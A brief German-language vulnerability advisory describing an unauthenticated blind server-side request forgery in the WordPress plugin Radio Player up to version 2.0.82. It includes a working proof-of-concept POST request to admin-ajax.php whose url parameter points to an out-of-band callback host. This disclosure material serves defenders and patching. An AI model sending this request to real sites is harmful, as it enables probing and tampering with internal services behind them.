
Radio Player <= 2.0.82 - Blinde, unauthentifizierte Server-Side Request Forgery
Radio Player <= 2.0.82 - Nicht authentifizierte Server-Side Request Forgery
Das Plugin Radio Player – Live Shoutcast, Icecast and Any Audio Stream Player für WordPress ist in allen Versionen bis einschließlich 2.0.82 anfällig für Server-Side Request Forgery. Dadurch können nicht authentifizierte Angreifer Webanfragen an beliebige Orte senden, die von der Webanwendung ausgehen und genutzt werden können, um Informationen aus internen Diensten abzufragen und zu verändern.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 127
action=radio_player_get_stream_data&nonce=feb9ecfbfa&utm_source=&url=http://918sodewycbbjnbts7cxy5bqyh48s0gp.bc.oast.site/live.m3u8